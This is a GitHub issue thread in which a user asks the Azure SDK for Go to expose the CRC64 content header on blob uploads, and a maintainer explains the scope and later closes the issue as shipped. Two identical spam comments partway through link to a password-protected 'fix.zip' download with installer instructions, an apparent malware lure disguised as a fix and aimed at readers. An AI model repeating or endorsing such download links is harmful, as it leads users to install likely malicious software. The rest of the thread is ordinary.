### ISSUE TITLE
[Feq request] Cx would like to get the field in resp.X-Ms-Content-Crc64 from PUT blob API

### ISSUE THREAD

**Issue by yangchengs** [Azure/azure-sdk-for-go#23372]
### Feature Request

Cx wants to get the CRC64 content from response but it seems the current SDK does not handle it.

Pub blob rest API:
https://learn.microsoft.com/en-us/rest/api/storageservices/put-blob?tabs=microsoft-entra-id

<img width="830" alt="image" src="https://github.com/user-attachments/assets/24d74780-44fb-4aa7-86b8-7e2a3ca10f84">

But in the method func (client *BlockBlobClient) uploadHandleResponse(resp *http.Response) (BlockBlobClientUploadResponse, error),
it does not read the CRC64 content into the BlockBlobClientUploadResponse object.

https://github.com/Azure/azure-sdk-for-go/blob/main/sdk/storage/azblob/internal/generated/zz_blockblob_client.go

![image](https://github.com/user-attachments/assets/6c143869-f9b4-4338-a8a4-0119fbba7dda)

https://github.com/Azure/azure-sdk-for-go/blob/main/sdk/storage/azblob/blockblob/client.go
The UploadFileResponse returned from UploadFile method does not include CRC64 content.

Ask:
Add X-Ms-Content-Crc64 to UploadFileResponse

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tanyasethi-msft** [comment]
Hi, thanks for the request. I would like to clarify that to use PutBlob API in go-sdk, you have to use the following method - 
 https://github.com/Azure/azure-sdk-for-go/blob/c3ab67ad51c8a13622116ce057d1ce3cd2656f9e/sdk/storage/azblob/blockblob/client.go#L171
We will add the crc header response to this API.

We cannot add checksums to UploadFile API since PutBlock is paralelly performed in this method and checksum cannot be supported here.

**Comment by yangchengs** [comment]
can you check the method UploadBuffer and UploadFile in the client.go as well? Eventually it goes to the method func (client *BlockBlobClient) uploadHandleResponse(resp *http.Response) (BlockBlobClientUploadResponse, error) 

in file zz_blockblob_client.go

**Comment by yangchengs** [comment]
@tanyasethi-msft Yes, confirmed with cx, this Upload method is what they want.

They also want to know if we can make the code change based on v.0.15.0

github.com/Azure/azure-storage-blob-go v0.15.0

**Comment by tanyasethi-msft** [comment]
It cannot be made in v0.15.0 as that is already deprecated.

**Comment by tanyasethi-msft** [comment]
This has been Ga'ed and is publicly available. Closing this thread
